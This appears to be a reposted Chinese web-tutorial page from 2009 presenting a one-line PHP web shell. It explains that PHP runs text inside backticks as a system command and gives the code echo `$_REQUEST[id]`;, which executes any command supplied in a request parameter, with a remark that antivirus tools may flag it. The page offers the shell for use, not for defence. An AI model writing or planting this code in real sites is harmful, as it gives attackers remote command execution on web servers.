当前位置: 首页 > 图文教程 > 网络编程 > PHP > php一句话cmdshell新型 (非一句话木马)

PHP
PHP设计聊天室步步通
PHPShop存在多个安全漏洞
PHP数据库开发知多少
利用js调用后台php进行数据处理原码
基于PHP与XML的PDF文档生成技术
PHP应用提速面面观
用PHP将数据导入到Foxmail
Win2000+Apache+MySql+PHP4+PERL安装使用小结
新版mysql+apache+php Linux安装指南
PHP利用COM对象访问SQLServer、Access
PHP中实现进程间通讯
用PHP开发GUI
新版PHP极大的增强功能和性能
利用文件属性结合Session实现在线人数统计
初探PHP5
用libtemplate实现静态网页生成
用PHP实现WEB动态网页静态
在Windows中安装Apache2和PHP4的权威指南
用PHP编程开发“虚拟域名”系统
15个小时----从修改程序到自己些程序

PHP 中的 php一句话cmdshell新型 (非一句话木马)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-12   浏览: 224 ::
收藏到网摘: n/a

php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
复制代码 代码如下:

<?php
/*一个新型的php一句话cmdshell(非一句话木马)
//原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
//局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码;
//write by skyfire
*/
echo `$_REQUEST[id]`;
?>